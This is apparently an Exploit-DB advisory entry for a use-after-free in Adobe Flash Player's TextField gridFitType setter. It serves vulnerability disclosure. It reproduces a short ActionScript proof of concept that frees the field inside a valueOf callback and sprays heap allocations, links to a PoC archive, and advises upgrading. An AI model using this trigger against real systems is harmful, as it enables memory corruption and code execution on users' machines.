Use-after-Free in TextField gridFitType setter

A use-after-free vulnerability exists in the TextField gridFitType setter in Adobe Flash Player. The vulnerability is caused by a race condition when the TextField object is removed while the gridFitType setter is being called. An attacker can exploit this vulnerability to execute arbitrary code in the context of the current user.

Mitigation:

Upgrade to the latest version of Adobe Flash Player.

Source

Exploit-DB raw data:

Source: https://code.google.com/p/google-security-research/issues/detail?id=418&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

There is a use-after-free in the TextField gridFitType setter. A PoC is below:

var test = this.createTextField("test", 1, 0, 0, 100, 100);
var n = {toString : func, valueOf : func};
test.gridFitType = n;

function func(){
	
	test.removeTextField();
	for(var i = 0; i < 1000; i++){
		var b = new flash.display.BitmapData(1000, 1000, true, 10);
		}
	trace("here");
	return "natalie";
	
	}

A PoC and fla are attached. Some other setters (thickness, tabIndex, etc.) are also impacted by the same UaF condition, additional SWFs are attached.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37877.zip